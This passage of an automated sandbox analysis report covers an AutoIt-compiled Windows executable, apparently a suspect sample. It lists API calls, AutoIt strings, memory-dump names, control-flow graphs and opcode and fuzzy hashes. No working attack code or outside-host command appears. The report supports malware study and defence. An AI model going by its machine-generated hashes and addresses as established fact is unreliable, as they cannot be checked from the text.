                                                                                                                                        • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\NOAH $$$$.exe,00000104), ref: 00428B5B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\NOAH $$$$.exe$CMDLINE$CMDLINERAW
                                                                                                                                        • API String ID: 3948761352-2821196677
                                                                                                                                        • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                                        • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                                                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                        • String ID: D)E$D)E$FILE
                                                                                                                                        • API String ID: 3888824918-361185794
                                                                                                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                        • _wcscat.LIBCMT ref: 00427541
                                                                                                                                        • _wcslen.LIBCMT ref: 00427551
                                                                                                                                        • _wcslen.LIBCMT ref: 00427562
                                                                                                                                        • _wcscat.LIBCMT ref: 0042757C
                                                                                                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                                        • String ID: Include$\
                                                                                                                                        • API String ID: 3173733714-3429789819
                                                                                                                                        • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                                                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                                        • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                                                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • _fseek.LIBCMT ref: 0045292B
                                                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                                        • _fseek.LIBCMT ref: 004529BF
                                                                                                                                        • _malloc.LIBCMT ref: 004529CA
                                                                                                                                        • _malloc.LIBCMT ref: 004529D6
                                                                                                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                                        • _free.LIBCMT ref: 00452A17
                                                                                                                                        • _free.LIBCMT ref: 00452A20
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1255752989-0
                                                                                                                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(00921DC8,000000FF,00000000), ref: 00410552
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00921DC8,000000FF,00000000), ref: 00410552
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc
                                                                                                                                        • String ID: Default
                                                                                                                                        • API String ID: 1579825452-753088835
                                                                                                                                        • Opcode ID: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                                                                                                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                                        • Opcode Fuzzy Hash: 9f85b68769bc30241e5c3250a976f4e3498bb03b948f4ec10db418ad02dabea8
                                                                                                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1972 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                                        • String ID: AU3!$EA06
                                                                                                                                        • API String ID: 1268643489-2658333250
                                                                                                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2008 401193-40119a 2002->2008 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2013 42b045-42b059 call 401000 call 40e0c0 2005->2013 2011 401219-40121f 2006->2011 2012 40115d 2006->2012 2009 4011a3-4011a9 2007->2009 2010 42afb4-42afc5 call 40f190 2007->2010 2009->2001 2015 4011af 2009->2015 2010->2008 2011->2001 2018 401225-42b06d call 468b0e 2011->2018 2016 401163-401166 2012->2016 2017 42b01d-42b024 2012->2017 2013->2000 2015->2001 2022 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2015->2022 2023 4011db-401202 SetTimer RegisterWindowMessageW 2015->2023 2025 42afe9-42b018 call 40f190 call 401a50 2016->2025 2026 40116c-401172 2016->2026 2017->2000 2024 42b02a-42b033 call 4370f4 2017->2024 2018->2008 2023->2008 2032 401204-401216 CreatePopupMenu 2023->2032 2024->2000 2025->2000 2026->2001 2034 401174-42afde call 45fd57 2026->2034 2034->2000 2045 42afe4 2034->2045 2045->2008
                                                                                                                                        APIs
                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                        • API String ID: 129472671-2362178303
                                                                                                                                        • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                        • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 004115F1
                                                                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                        • String ID: ,*H$4*H$@fI
                                                                                                                                        • API String ID: 615853336-1459471987
                                                                                                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
